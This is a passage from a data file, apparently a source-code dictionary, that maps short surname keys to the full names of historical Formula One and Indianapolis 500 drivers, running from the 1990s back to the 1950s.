'Gerhard Berger',\r\n 'larini' : 'Nicola Larini',\r\n 'katayama' : 'Ukyo Katayama',\r\n 'sospiri' : 'Vincenzo Sospiri',\r\n 'morbidelli' : 'Gianni Morbidelli',\r\n 'fontana' : 'Norberto Fontana',\r\n 'lamy' : 'Pedro Lamy',\r\n 'brundle' : 'Martin Brundle',\r\n 'montermini' : 'Andrea Montermini',\r\n 'lavaggi' : 'Giovanni Lavaggi',\r\n 'blundell' : 'Mark Blundell',\r\n 'suzuki' : 'Aguri Suzuki',\r\n 'inoue' : 'Taki Inoue',\r\n 'moreno' : 'Roberto Moreno',\r\n 'wendlinger' : 'Karl Wendlinger',\r\n 'gachot' : 'Bertrand Gachot',\r\n 'schiattarella' : 'Domenico Schiattarella',\r\n 'martini' : 'Pierluigi Martini',\r\n 'mansell' : 'Nigel Mansell',\r\n 'boullion' : 'Jean-Christophe Boullion',\r\n 'papis' : 'Massimiliano Papis',\r\n 'deletraz' : 'Jean-Denis Deletraz',\r\n 'tarquini' : 'Gabriele Tarquini',\r\n 'comas' : 'erik Comas',\r\n 'brabham' : 'David Brabham',\r\n 'senna' : 'Ayrton Senna',\r\n 'bernard' : 'eric Bernard',\r\n 'fittipaldi' : 'Christian Fittipaldi',\r\n 'alboreto' : 'Michele Alboreto',\r\n 'beretta' : 'Olivier Beretta',\r\n 'ratzenberger' : 'Roland Ratzenberger',\r\n 'belmondo' : 'Paul Belmondo',\r\n 'lehto' : 'Jyrki Jarvilehto',\r\n 'cesaris' : 'Andrea de Cesaris',\r\n 'gounon' : 'Jean-Marc Gounon',\r\n 'alliot' : 'Philippe Alliot',\r\n 'adams' : 'Philippe Adams',\r\n 'dalmas' : 'Yannick Dalmas',\r\n 'noda' : 'Hideki Noda',\r\n 'lagorce' : 'Franck Lagorce',\r\n 'prost' : 'Alain Prost',\r\n 'warwick' : 'Derek Warwick',\r\n 'patrese' : 'Riccardo Patrese',\r\n 
'barbazza' : 'Fabrizio Barbazza',\r\n 'andretti' : 'Michael Andretti',\r\n 'capelli' : 'Ivan Capelli',\r\n 'boutsen' : 'Thierry Boutsen',\r\n 'apicella' : 'Marco Apicella',\r\n 'naspetti' : 'Emanuele Naspetti',\r\n 'toshio_suzuki' : 'Toshio Suzuki',\r\n 'gugelmin' : 'Mauricio Gugelmin',\r\n 'poele' : 'Eric van de Poele',\r\n 'grouillard' : 'Olivier Grouillard',\r\n 'chiesa' : 'Andrea Chiesa',\r\n 'modena' : 'Stefano Modena',\r\n 'amati' : 'Giovanna Amati',\r\n 'caffi' : 'Alex Caffi',\r\n 'bertaggia' : 'Enrico Bertaggia',\r\n 'mccarthy' : 'Perry McCarthy',\r\n 'lammers' : 'Jan Lammers',\r\n 'piquet' : 'Nelson Piquet',\r\n 'satoru_nakajima' : 'Satoru Nakajima',\r\n 'pirro' : 'Emanuele Pirro',\r\n 'johansson' : 'Stefan Johansson',\r\n 'bailey' : 'Julian Bailey',\r\n 'chaves' : 'Pedro Chaves',\r\n 'bartels' : 'Michael Bartels',\r\n 'hattori' : 'Naoki Hattori',\r\n 'nannini' : 'Alessandro Nannini',\r\n 'schneider' : 'Bernd Schneider',\r\n 'barilla' : 'Paolo Barilla',\r\n 'foitek' : 'Gregor Foitek',\r\n 'langes' : 'Claudio Langes',\r\n 'gary_brabham' : 'Gary Brabham',\r\n 'donnelly' : 'Martin Donnelly',\r\n 'giacomelli' : 'Bruno Giacomelli',\r\n 'alguersuari' : 'Jaime Alguersuari',\r\n 'grosjean' : 'Romain Grosjean',\r\n 'kobayashi' : 'Kamui Kobayashi',\r\n 'palmer' : 'Jonathan Palmer',\r\n 'danner' : 'Christian Danner',\r\n 'cheever' : 'Eddie Cheever',\r\n 'sala' : 'Luis Perez-Sala',\r\n 'ghinzani' : 'Piercarlo Ghinzani',\r\n 'weidler' : 'Volker Weidler',\r\n 'raphanel' : 'Pierre-Henri Raphanel',\r\n 'arnoux' : 'Rene Arnoux',\r\n 'joachim_winkelhock' : 'Joachim Winkelhock',\r\n 'larrauri' : 'Oscar Larrauri',\r\n 'streiff' : 'Philippe Streiff',\r\n 'campos' : 'Adrian Campos',\r\n 'schlesser' : 'Jean-Louis Schlesser',\r\n 'fabre' : 'Pascal Fabre',\r\n 'fabi' : 'Teo Fabi',\r\n 'forini' : 'Franco Forini',\r\n 'laffite' : 'Jacques Laffite',\r\n 'angelis' : 'Elio de Angelis',\r\n 'dumfries' : 'Johnny Dumfries',\r\n 'tambay' : 'Patrick Tambay',\r\n 'surer' : 'Marc Surer',\r\n 'keke_rosberg' : 'Keke Rosberg',\r\n 'jones' : 'Alan Jones',\r\n 'rothengatter' : 'Huub Rothengatter',\r\n 'berg' : 'Allen Berg',\r\n 'manfred_winkelhock' : 'Manfred Winkelhock',\r\n 'lauda' : 'Niki Lauda',\r\n 'hesnault' : 'Francois Hesnault',\r\n 'baldi' : 'Mauro Baldi',\r\n 'bellof' : 'Stefan Bellof',\r\n 'acheson' : 'Kenny Acheson',\r\n 'watson' : 'John Watson',\r\n 'cecotto' : 'Johnny Cecotto',\r\n 'gartner' : 'Jo Gartner',\r\n 'corrado_fabi' : 'Corrado Fabi',\r\n 'thackwell' : 'Mike Thackwell',\r\n 'serra' : 'Chico Serra',\r\n 'sullivan' : 'Danny Sullivan',\r\n 'salazar' : 'Eliseo Salazar',\r\n 'guerrero' : 'Roberto Guerrero',\r\n 'boesel' : 'Raul Boesel',\r\n 'jarier' : 'Jean-Pierre Jarier',\r\n 'villeneuve_sr' : 'Jacques Villeneuve Sr.',\r\n 'reutemann' : 'Carlos Reutemann',\r\n 'mass' : 'Jochen Mass',\r\n 'borgudd' : 'Slim Borgudd',\r\n 'pironi' : 'Didier Pironi',\r\n 'gilles_villeneuve' : 'Gilles Villeneuve',\r\n 'paletti' : 'Riccardo Paletti',\r\n 'henton' : 'Brian Henton',\r\n 'daly' : 'Derek Daly',\r\n 'mario_andretti' : 'Mario Andretti',\r\n 'villota' : 'Emilio de Villota',\r\n 'lees' : 'Geoff Lees',\r\n 'byrne' : 'Tommy Byrne',\r\n 'keegan' : 'Rupert Keegan',\r\n 'rebaque' : 'Hector Rebaque',\r\n 'gabbiani' : 'Beppe Gabbiani',\r\n 'cogan' : 'Kevin Cogan',\r\n 'guerra' : 'Miguel Angel Guerra',\r\n 'stohr' : 'Siegfried Stohr',\r\n 'zunino' : 'Ricardo Zunino',\r\n 'londono' : 'Ricardo Londono',\r\n 'jabouille' : 'Jean-Pierre Jabouille',\r\n 'francia' : 'Giorgio Francia',\r\n 'depailler' : 'Patrick Depailler',\r\n 
'scheckter' : 'Jody Scheckter',\r\n 'regazzoni' : 'Clay Regazzoni',\r\n 'emerson_fittipaldi' : 'Emerson Fittipaldi',\r\n 'kennedy' : 'Dave Kennedy',\r\n 'south' : 'Stephen South',\r\n 'needell' : 'Tiff Needell',\r\n 'desire_wilson' : 'Desire Wilson',\r\n 'ertl' : 'Harald Ertl',\r\n 'brambilla' : 'Vittorio Brambilla',\r\n 'hunt' : 'James Hunt',\r\n 'merzario' : 'Arturo Merzario',\r\n 'stuck' : 'Hans-Joachim Stuck',\r\n 'brancatelli' : 'Gianfranco Brancatelli',\r\n 'ickx' : 'Jacky Ickx',\r\n 'gaillard' : 'Patrick Gaillard',\r\n 'ribeiro' : 'Alex Ribeiro',\r\n 'peterson' : 'Ronnie Peterson',\r\n 'lunger' : 'Brett Lunger',\r\n 'ongais' : 'Danny Ongais',\r\n 'leoni' : 'Lamberto Leoni',\r\n 'galica' : 'Divina Galica',\r\n 'stommelen' : 'Rolf Stommelen',\r\n 'colombo' : 'Alberto Colombo',\r\n 'trimmer' : 'Tony Trimmer',\r\n 'binder' : 'Hans Binder',\r\n 'bleekemolen' : 'Michael Bleekemolen',\r\n 'gimax' : 'Carlo Franchi',\r\n 'rahal' : 'Bobby Rahal',\r\n 'pace' : 'Carlos Pace',\r\n 'ian_scheckter' : 'Ian Scheckter',\r\n 'pryce' : 'Tom Pryce',\r\n 'hoffmann' : 'Ingo Hoffmann',\r\n 'zorzi' : 'Renzo Zorzi',\r\n 'nilsson' : 'Gunnar Nilsson',\r\n 'perkins' : 'Larry Perkins',\r\n 'hayje' : 'Boy Hayje',\r\n 'neve' : 'Patrick Neve',\r\n 'purley' : 'David Purley',\r\n 'andersson' : 'Conny Andersson',\r\n 'dryver' : 'Bernard de Dryver',\r\n 'oliver' : 'Jackie Oliver',\r\n 'kozarowitzky' : 'Mikko Kozarowitzky',\r\n 'sutcliffe' : 'Andy Sutcliffe',\r\n 'edwards' : 'Guy Edwards',\r\n 'mcguire' : 'Brian McGuire',\r\n 'schuppan' : 'Vern Schuppan',\r\n 'heyer' : 'Hans Heyer',\r\n 'pilette' : 'Teddy Pilette',\r\n 'ashley' : 'Ian Ashley',\r\n 'kessel' : 'Loris Kessel',\r\n 'takahashi' : 'Kunimitsu Takahashi',\r\n 'hoshino' : 'Kazuyoshi Hoshino',\r\n 'takahara' : 'Noritake Takahara',\r\n 'lombardi' : 'Lella Lombardi',\r\n 'evans' : 'Bob Evans',\r\n 'leclere' : 'Michel Leclere',\r\n 'amon' : 'Chris Amon',\r\n 'zapico' : 'Emilio Zapico',\r\n 'pescarolo' : 'Henri Pescarolo',\r\n 'nelleman' : 'Jac Nelleman',\r\n 'magee' : 'Damien Magee',\r\n 'wilds' : 'Mike Wilds',\r\n 'pesenti_rossi' : 'Alessandro Pesenti-Rossi',\r\n 'stuppacher' : 'Otto Stuppacher',\r\n 'brown' : 'Warwick Brown',\r\n 'hasemi' : 'Masahiro Hasemi',\r\n 'donohue' : 'Mark Donohue',\r\n 'hill' : 'Graham Hill',\r\n 'wilson_fittipaldi' : 'Wilson Fittipaldi',\r\n 'tunmer' : 'Guy Tunmer',\r\n 'keizan' : 'Eddie Keizan',\r\n 'charlton' : 'Dave Charlton',\r\n 'brise' : 'Tony Brise',\r\n 'wunderink' : 'Roelof Wunderink',\r\n 'migault' : 'Francois Migault',\r\n 'palm' : 'Torsten Palm',\r\n 'lennep' : 'Gijs van Lennep',\r\n 'fushida' : 'Hiroshi Fushida',\r\n 'nicholson' : 'John Nicholson',\r\n 'morgan' : 'Dave Morgan',\r\n 'crawford' : 'Jim Crawford',\r\n 'vonlanthen' : 'Jo Vonlanthen',\r\n 'hulme' : 'Denny Hulme',\r\n 'hailwood' : 'Mike Hailwood',\r\n 'beltoise' : 'Jean-Pierre Beltoise',\r\n 'ganley' : 'Howden Ganley',\r\n 'robarts' : 'Richard Robarts',\r\n 'revson' : 'Peter Revson',\r\n 'driver' : 'Paddy Driver',\r\n 'belso' : 'Tom Belso',\r\n 'redman' : 'Brian Redman',\r\n 'opel' : 'Rikky von Opel',\r\n 'schenken' : 'Tim Schenken',\r\n 'larrousse' : 'Gerard Larrousse',\r\n 'kinnunen' : 'Leo Kinnunen',\r\n 'wisell' : 'Reine Wisell',\r\n 'roos' : 'Bertil Roos',\r\n 'dolhem' : 'Jose Dolhem',\r\n 'gethin' : 'Peter Gethin',\r\n 'bell' : 'Derek Bell',\r\n 'hobbs' : 'David Hobbs',\r\n 'quester' : 'Dieter Quester',\r\n 'koinigg' : 'Helmuth Koinigg',\r\n 'facetti' : 'Carlo Facetti',\r\n 'wietzes' : 'Eppie Wietzes',\r\n 'cevert' : 'Francois Cevert',\r\n 'stewart' : 
'Jackie Stewart',\r\n 'beuttler' : 'Mike Beuttler',\r\n 'galli' : 'Nanni Galli',\r\n 'bueno' : 'Luiz Bueno',\r\n 'follmer' : 'George Follmer',\r\n 'adamich' : 'Andrea de Adamich',\r\n 'pretorius' : 'Jackie Pretorius',\r\n 'williamson' : 'Roger Williamson',\r\n 'mcrae' : 'Graham McRae',\r\n 'marko' : 'Helmut Marko',\r\n 'walker' : 'David Walker',\r\n 'roig' : 'Alex Soler-Roig',\r\n 'love' : 'John Love',\r\n 'surtees' : 'John Surtees',\r\n 'barber' : 'Skip Barber',\r\n 'brack' : 'Bill Brack',\r\n 'posey' : 'Sam Posey',\r\n 'rodriguez' : 'Pedro Rodriguez',\r\n 'siffert' : 'Jo Siffert',\r\n 'bonnier' : 'Jo Bonnier',\r\n 'mazet' : 'Francois Mazet',\r\n 'jean' : 'Max Jean',\r\n 'elford' : 'Vic Elford',\r\n 'moser' : 'Silvio Moser',\r\n 'eaton' : 'George Eaton',\r\n 'lovely' : 'Pete Lovely',\r\n 'craft' : 'Chris Craft',\r\n 'cannon' : 'John Cannon',\r\n 'jack_brabham' : 'Jack Brabham',\r\n 'miles' : 'John Miles',\r\n 'rindt' : 'Jochen Rindt',\r\n 'gavin' : 'Johnny Servoz-Gavin',\r\n 'mclaren' : 'Bruce McLaren',\r\n 'courage' : 'Piers Courage',\r\n 'klerk' : 'Peter de Klerk',\r\n 'giunti' : 'Ignazio Giunti',\r\n 'gurney' : 'Dan Gurney',\r\n 'hahne' : 'Hubert Hahne',\r\n 'hutchison' : 'Gus Hutchison',\r\n 'westbury' : 'Peter Westbury',\r\n 'tingle' : 'Sam Tingle',\r\n 'rooyen' : 'Basil van Rooyen',\r\n 'attwood' : 'Richard Attwood',\r\n 'pease' : 'Al Pease',\r\n 'cordts' : 'John Cordts',\r\n 'clark' : 'Jim Clark',\r\n 'spence' : 'Mike Spence',\r\n 'scarfiotti' : 'Ludovico Scarfiotti',\r\n 'bianchi' : 'Lucien Bianchi',\r\n 'jo_schlesser' : 'Jo Schlesser',\r\n 'widdows' : 'Robin Widdows',\r\n 'ahrens' : 'Kurt Ahrens',\r\n 'gardner' : 'Frank Gardner',\r\n 'unser' : 'Bobby Unser',\r\n 'solana' : 'Moises Solana',\r\n 'anderson' : 'Bob Anderson',\r\n 'botha' : 'Luki Botha',\r\n 'bandini' : 'Lorenzo Bandini',\r\n 'ginther' : 'Richie Ginther',\r\n 'parkes' : 'Mike Parkes',\r\n 'irwin' : 'Chris Irwin',\r\n 'ligier' : 'Guy Ligier',\r\n 'rees' : 'Alan Rees',\r\n 'hart' : 'Brian Hart',\r\n 'fisher' : 'Mike Fisher',\r\n 'tom_jones' : 'Tom Jones',\r\n 'baghetti' : 'Giancarlo Baghetti',\r\n 'williams' : 'Jonathan Williams',\r\n 'bondurant' : 'Bob Bondurant',\r\n 'arundell' : 'Peter Arundell',\r\n 'vic_wilson' : 'Vic Wilson',\r\n 'taylor' : 'John Taylor',\r\n 'lawrence' : 'Chris Lawrence',\r\n 'trevor_taylor' : 'Trevor Taylor',\r\n 'geki' : 'Giacomo Russo',\r\n 'phil_hill' : 'Phil Hill',\r\n 'ireland' : 'Innes Ireland',\r\n 'bucknum' : 'Ronnie Bucknum',\r\n 'hawkins' : 'Paul Hawkins',\r\n 'prophet' : 'David Prophet',\r\n 'maggs' : 'Tony Maggs',\r\n 'blokdyk' : 'Trevor Blokdyk',\r\n 'lederle' : 'Neville Lederle',\r\n 'serrurier' : 'Doug Serrurier',\r\n 'niemann' : 'Brausch Niemann',\r\n 'pieterse' : 'Ernie Pieterse',\r\n 'puzey' : 'Clive Puzey',\r\n 'reed' : 'Ray Reed',\r\n 'clapham' : 'David Clapham',\r\n 'blignaut' : 'Alex Blignaut',\r\n 'gregory' : 'Masten Gregory',\r\n 'rhodes' : 'John Rhodes',\r\n 'raby' : 'Ian Raby',\r\n 'rollinson' : 'Alan Rollinson',\r\n 'gubby' : 'Brian Gubby',\r\n 'mitter' : 'Gerhard Mitter',\r\n 'bussinello' : 'Roberto Bussinello',\r\n 'vaccarella' : 'Nino Vaccarella',\r\n 'bassi' : 'Giorgio Bassi',\r\n 'trintignant' : 'Maurice Trintignant',\r\n 'collomb' : 'Bernard Collomb',\r\n 'andre_pilette' : 'Andre Pilette',\r\n 'beaufort' : 'Carel Godin de Beaufort',\r\n 'barth' : 'Edgar Barth',\r\n 'cabral' : 'Mario de Araujo Cabral',\r\n 'hansgen' : 'Walt Hansgen',\r\n 'sharp' : 'Hap Sharp',\r\n 'mairesse' : 'Willy Mairesse',\r\n 'campbell-jones' : 'John Campbell-Jones',\r\n 'burgess' : 'Ian 
Burgess',\r\n 'settember' : 'Tony Settember',\r\n 'estefano' : 'Nasif Estefano',\r\n 'hall' : 'Jim Hall',\r\n 'parnell' : 'Tim Parnell',\r\n 'kuhnke' : 'Kurt Kuhnke',\r\n 'ernesto_brambilla' : 'Ernesto Brambilla',\r\n 'lippi' : 'Roberto Lippi',\r\n 'seiffert' : 'Gunther Seiffert',\r\n 'abate' : 'Carlo Abate',\r\n 'starrabba' : 'Gaetano Starrabba',\r\n 'broeker' : 'Peter Broeker',\r\n 'ward' : 'Rodger Ward',\r\n 'vos' : 'Ernie de Vos',\r\n 'dochnal' : 'Frank Dochnal',\r\n 'monarch' : 'Thomas Monarch',\r\n 'lewis' : 'Jackie Lewis',\r\n 'ricardo_rodriguez' : 'Ricardo Rodriguez',\r\n 'seidel' : 'Wolfgang Seidel',\r\n 'salvadori' : 'Roy Salvadori',\r\n 'pon' : 'Ben Pon',\r\n 'slotemaker' : 'Rob Slotemaker',\r\n 'marsh' : 'Tony Marsh',\r\n 'ashmore' : 'Gerry Ashmore',\r\n 'schiller' : 'Heinz Schiller',\r\n 'davis' : 'Colin Davis',\r\n 'chamberlain' : 'Jay Chamberlain',\r\n 'shelly' : 'Tony Shelly',\r\n 'greene' : 'Keith Greene',\r\n 'walter' : 'Heini Walter',\r\n 'prinoth' : 'Ernesto Prinoth',\r\n 'penske' : 'Roger Penske',\r\n 'schroeder' : 'Rob Schroeder',\r\n 'mayer' : 'Timmy Mayer',\r\n 'johnstone' : 'Bruce Johnstone',\r\n 'harris' : 'Mike Harris',\r\n 'hocking' : 'Gary Hocking',\r\n 'vyver' : 'Syd van der Vyver',\r\n 'moss' : 'Stirling Moss',\r\n 'trips' : 'Wolfgang von Trips',\r\n 'allison' : 'Cliff Allison',\r\n 'herrmann' : 'Hans Herrmann',\r\n 'brooks' : 'Tony Brooks',\r\n 'may' : 'Michael May',\r\n 'henry_taylor' : 'Henry Taylor',\r\n 'gendebien' : 'Olivier Gendebien',\r\n 'scarlatti' : 'Giorgio Scarlatti',\r\n 'naylor' : 'Brian Naylor',\r\n 'bordeu' : 'Juan Manuel Bordeu',\r\n 'fairman' : 'Jack Fairman',\r\n 'natili' : 'Massimo Natili',\r\n 'monteverdi' : 'Peter Monteverdi',\r\n 'pirocchi' : 'Renato Pirocchi',\r\n 'duke' : 'Geoff Duke',\r\n 'thiele' : 'Alfonso Thiele',\r\n 'boffa' : 'Menato Boffa',\r\n 'ryan' : 'Peter Ryan',\r\n 'ruby' : 'Lloyd Ruby',\r\n 'ken_miles' : 'Ken Miles',\r\n 'menditeguy' : 'Carlos Menditeguy',\r\n 'larreta' : 'Alberto Rodriguez Larreta',\r\n 'gonzalez' : 'Jose Froilan Gonzalez',\r\n 'bonomi' : 'Roberto Bonomi',\r\n 'munaron' : 'Gino Munaron',\r\n 'schell' : 'Harry Schell',\r\n 'stacey' : 'Alan Stacey',\r\n 'chimeri' : 'Ettore Chimeri',\r\n 'creus' : 'Antonio Creus',\r\n 'bristow' : 'Chris Bristow',\r\n 'halford' : 'Bruce Halford',\r\n 'daigh' : 'Chuck Daigh',\r\n 'reventlow' : 'Lance Reventlow',\r\n 'rathmann' : 'Jim Rathmann',\r\n 'goldsmith' : 'Paul Goldsmith',\r\n 'branson' : 'Don Branson',\r\n 'thomson' : 'Johnny Thomson',\r\n 'johnson' : 'Eddie Johnson',\r\n 'veith' : 'Bob Veith',\r\n 'tingelstad' : 'Bud Tingelstad',\r\n 'christie' : 'Bob Christie',\r\n 'amick' : 'Red Amick',\r\n 'darter' : 'Duane Carter',\r\n 'homeier' : 'Bill Homeier',\r\n 'hartley' : 'Gene Hartley',\r\n 'stevenson' : 'Chuck Stevenson',\r\n 'grim' : 'Bobby Grim',\r\n 'templeman' : 'Shorty Templeman',\r\n 'hurtubise' : 'Jim Hurtubise',\r\n 'bryan' : 'Jimmy Bryan',\r\n 'ruttman' : 'Troy Ruttman',\r\n 'sachs' : 'Eddie Sachs',\r\n 'freeland' : 'Don Freeland',\r\n 'bettenhausen' : 'Tony Bettenhausen',\r\n 'weiler' : 'Wayne Weiler',\r\n 'foyt' : 'Anthony Foyt',\r\n 'russo' : 'Eddie Russo',\r\n 'boyd' : 'Johnny Boyd',\r\n 'force' : 'Gene Force',\r\n 'mcwithey' : 'Jim McWithey',\r\n 'sutton' : 'Len Sutton',\r\n 'dick_rathmann' : 'Dick Rathmann',\r\n 'herman' : 'Al Herman',\r\n 'dempsey_wilson' : 'Dempsey Wilson',\r\n 'mike_taylor' : 'Mike Taylor',\r\n 'flockhart' : 'Ron Flockhart',\r\n 'piper' : 'David Piper',\r\n 'cabianca' : 'Giulio Cabianca',\r\n 'drogo' : 'Piero Drogo',\r\n 'gamble' : 
'Fred Gamble',\r\n 'owen' : 'Arthur Owen',\r\n 'gould' : 'Horace Gould',\r\n 'drake' : 'Bob Drake',\r\n 'bueb' : 'Ivor Bueb',\r\n 'changy' : 'Alain de Changy',\r\n 'filippis' : 'Maria de Filippis',\r\n 'lucienbonnet' : 'Jean Lucienbonnet',\r\n 'testut' : 'Andre Testut',\r\n 'behra' : 'Jean Behra',\r\n 'paul_russo' : 'Paul Russo',\r\n 'daywalt' : 'Jimmy Daywalt',\r\n 'arnold' : 'Chuck Arnold',\r\n 'keller' : 'Al Keller',\r\n 'flaherty' : 'Pat Flaherty',\r\n 'cheesbourg' : 'Bill Cheesbourg',\r\n 'ray_crawford' : 'Ray Crawford',\r\n 'turner' : 'Jack Turner',\r\n 'weyant' : 'Chuck Weyant',\r\n 'larson' : 'Jud Larson',\r\n 'magill' : 'Mike Magill',\r\n 'shelby' : 'Carroll Shelby',\r\n 'orey' : 'Fritz d\\'Orey',\r\n 'fontes' : 'Azdrubal Fontes',\r\n 'ashdown' : 'Peter Ashdown',\r\n 'bill_moss' : 'Bill Moss',\r\n 'dennis_taylor' : 'Dennis Taylor',\r\n 'blanchard' : 'Harry Blanchard',\r\n 'tomaso' : 'Alessandro de Tomaso',\r\n 'constantine' : 'George Constantine',\r\n 'said' : 'Bob Said',\r\n 'cade' : 'Phil Cade',\r\n 'musso' : 'Luigi Musso',\r\n 'hawthorn' : 'Mike Hawthorn',\r\n 'fangio' : 'Juan Fangio',\r\n 'godia' : 'Paco Godia',\r\n 'collins' : 'Peter Collins',\r\n 'kavanagh' : 'Ken Kavanagh',\r\n 'gerini' : 'Gerino Gerini',\r\n 'kessler' : 'Bruce Kessler',\r\n 'emery' : 'Paul Emery',\r\n 'piotti' : 'Luigi Piotti',\r\n 'ecclestone' : 'Bernie Ecclestone',\r\n 'taramazzo' : 'Luigi Taramazzo',\r\n 'chiron' : 'Louis Chiron',\r\n 'lewis-evans' : 'Stuart Lewis-Evans',\r\n 'george_amick' : 'George Amick',\r\n 'reece' : 'Jimmy Reece',\r\n 'parsons' : 'Johnnie Parsons',\r\n 'tolan' : 'Johnnie Tolan',\r\n 'garrett' : 'Billy Garrett',\r\n 'elisian' : 'Ed Elisian',\r\n 'connor' : 'Pat O\\'Connor',\r\n 'jerry_unser' : 'Jerry Unser',\r\n 'bisch' : 'Art Bisch',\r\n 'goethals' : 'Christian Goethals',\r\n 'gibson' : 'Dick Gibson',\r\n 'la_caze' : 'Robert La Caze',\r\n 'guelfi' : 'Andre Guelfi',\r\n 'picard' : 'Francois Picard',\r\n 'bridger' : 'Tom Bridger',\r\n 'portago' : 'Alfonso de Portago',\r\n 'perdisa' : 'Cesare Perdisa',\r\n 'castellotti' : 'Eugenio Castellotti',\r\n 'simon' : 'Andre Simon',\r\n 'leston' : 'Les Leston',\r\n 'hanks' : 'Sam Hanks',\r\n 'linden' : 'Andy Linden',\r\n 'teague' : 'Marshall Teague',\r\n 'edmunds' : 'Don Edmunds',\r\n 'agabashian' : 'Fred Agabashian',\r\n 'george' : 'Elmer George',\r\n 'macdowel' : 'Mike MacDowel',\r\n 'mackay-fraser' : 'Herbert MacKay-Fraser',\r\n 'gerard' : 'Bob Gerard',\r\n 'maglioli' : 'Umberto Maglioli',\r\n 'england' : 'Paul England',\r\n 'landi' : 'Chico Landi',\r\n 'uria' : 'Alberto Uria',\r\n 'ramos' : 'Hernando da Silva Ramos',\r\n 'bayol' : 'Elie Bayol',\r\n 'manzon' : 'Robert Manzon',\r\n 'rosier' : 'Louis Rosier',\r\n 'sweikert' : 'Bob Sweikert',\r\n 'griffith' : 'Cliff Griffith',\r\n 'dinsmore' : 'Duke Dinsmore',\r\n 'andrews' : 'Keith Andrews',\r\n 'frere' : 'Paul Frere',\r\n 'villoresi' : 'Luigi Villoresi',\r\n 'scotti' : 'Piero Scotti',\r\n 'chapman' : 'Colin Chapman',\r\n 'titterington' : 'Desmond Titterington',\r\n 'scott_brown' : 'Archie Scott Brown',\r\n 'volonterio' : 'Ottorino Volonterio',\r\n 'milhoux' : 'Andre Milhoux',\r\n 'graffenried' : 'Toulo de Graffenried',\r\n 'taruffi' : 'Piero Taruffi',\r\n 'farina' : 'Nino Farina',\r\n 'mieres' : 'Roberto Mieres',\r\n 'mantovani' : 'Sergio Mantovani',\r\n 'bucci' : 'Clemar Bucci',\r\n 'iglesias' : 'Jesus Iglesias',\r\n 'ascari' : 'Alberto Ascari',\r\n 'kling' : 'Karl Kling',\r\n 'birger' : 'Pablo Birger',\r\n 'pollet' : 'Jacques Pollet',\r\n 'macklin' : 'Lance Macklin',\r\n 'whiteaway' : 'Ted 
Whiteaway',\r\n 'davies' : 'Jimmy Davies',\r\n 'faulkner' : 'Walt Faulkner',\r\n 'niday' : 'Cal Niday',\r\n 'cross' : 'Art Cross',\r\n 'vukovich' : 'Bill Vukovich',\r\n 'mcgrath' : 'Jack McGrath',\r\n 'hoyt' : 'Jerry Hoyt',\r\n 'claes' : 'Johnny Claes',\r\n 'peter_walker' : 'Peter Walker',\r\n 'sparken' : 'Mike Sparken',\r\n 'wharton' : 'Ken Wharton',\r\n 'mcalpine' : 'Kenneth McAlpine',\r\n 'marr' : 'Leslie Marr',\r\n 'rolt' : 'Tony Rolt',\r\n 'fitch' : 'John Fitch',\r\n 'lucas' : 'Jean Lucas',\r\n 'bira' : 'Prince Bira',\r\n 'marimon' : 'Onofre Marimon',\r\n 'loyer' : 'Roger Loyer',\r\n 'daponte' : 'Jorge Daponte',\r\n 'nazaruk' : 'Mike Nazaruk',\r\n 'crockett' : 'Larry Crockett',\r\n 'ayulo' : 'Manny Ayulo',\r\n 'armi' : 'Frank Armi',\r\n 'webb' : 'Travis Webb',\r\n 'duncan' : 'Len Duncan',\r\n 'mccoy' : 'Ernie McCoy',\r\n 'swaters' : 'Jacques Swaters',\r\n 'georges_berger' : 'Georges Berger',\r\n 'beauman' : 'Don Beauman',\r\n 'thorne' : 'Leslie Thorne',\r\n 'whitehouse' : 'Bill Whitehouse',\r\n 'riseley_prichard' : 'John Riseley-Prichard',\r\n 'reg_parnell' : 'Reg Parnell',\r\n 'whitehead' : 'Peter Whitehead',\r\n 'brandon' : 'Eric Brandon',\r\n 'alan_brown' : 'Alan Brown',\r\n 'nuckey' : 'Rodney Nuckey',\r\n 'lang' : 'Hermann Lang',\r\n 'helfrich' : 'Theo Helfrich',\r\n 'wacker' : 'Fred Wacker',\r\n 'riu' : 'Giovanni de Riu',\r\n 'galvez' : 'Oscar Galvez',\r\n 'john_barber' : 'John Barber',\r\n 'bonetto' : 'Felice Bonetto',\r\n 'cruz' : 'Adolfo Cruz',\r\n 'nalon' : 'Duke Nalon',\r\n 'scarborough' : 'Carl Scarborough',\r\n 'holland' : 'Bill Holland',\r\n 'bob_scott' : 'Bob Scott',\r\n 'legat' : 'Arthur Legat',\r\n 'cabantous' : 'Yves Cabantous',\r\n 'crook' : 'Tony Crook',\r\n 'jimmy_stewart' : 'Jimmy Stewart',\r\n 'ian_stewart' : 'Ian Stewart',\r\n 'duncan_hamilton' : 'Duncan Hamilton',\r\n 'klodwig' : 'Ernst Klodwig',\r\n 'krause' : 'Rudolf Krause',\r\n 'karch' : 'Oswald Karch',\r\n 'heeks' : 'Willi Heeks',\r\n 'fitzau' : 'Theo Fitzau',\r\n 'adolff' : 'Kurt Adolff',\r\n 'bechem' : 'Gunther Bechem',\r\n 'bauer' : 'Erwin Bauer',\r\n 'hans_stuck' : 'Hans von Stuck',\r\n 'loof' : 'Ernst Loof',\r\n 'scherrer' : 'Albert Scherrer',\r\n 'terra' : 'Max de Terra',\r\n 'hirt' : 'Peter Hirt',\r\n 'carini' : 'Piero Carini',\r\n 'fischer' : 'Rudi Fischer',\r\n 'ulmen' : 'Toni Ulmen',\r\n 'abecassis' : 'George Abecassis',\r\n 'george_connor' : 'George Connor',\r\n 'rigsby' : 'Jim Rigsby',\r\n 'james' : 'Joe James',\r\n 'schindler' : 'Bill Schindler',\r\n 'fonder' : 'George Fonder',\r\n 'banks' : 'Henry Banks',\r\n 'mcdowell' : 'Johnny McDowell',\r\n 'miller' : 'Chet Miller',\r\n 'ball' : 'Bobby Ball',\r\n 'tornaco' : 'Charles de Tornaco',\r\n 'laurent' : 'Roger Laurent',\r\n 'obrien' : 'Robert O\\'Brien',\r\n 'gaze' : 'Tony Gaze',\r\n 'charrington' : 'Robin Montgomerie-Charrington',\r\n 'comotti' : 'Franco Comotti',\r\n 'etancelin' : 'Philippe Etancelin',\r\n 'poore' : 'Dennis Poore',\r\n 'thompson' : 'Eric Thompson',\r\n 'downing' : 'Ken Downing',\r\n 'graham_whitehead' : 'Graham Whitehead',\r\n 'bianco' : 'Gino Bianco',\r\n 'murray' : 'David Murray',\r\n 'cantoni' : 'Eitel Cantoni',\r\n 'aston' : 'Bill Aston',\r\n 'brudes' : 'Adolf Brudes',\r\n 'riess' : 'Fritz Riess',\r\n 'niedermayr' : 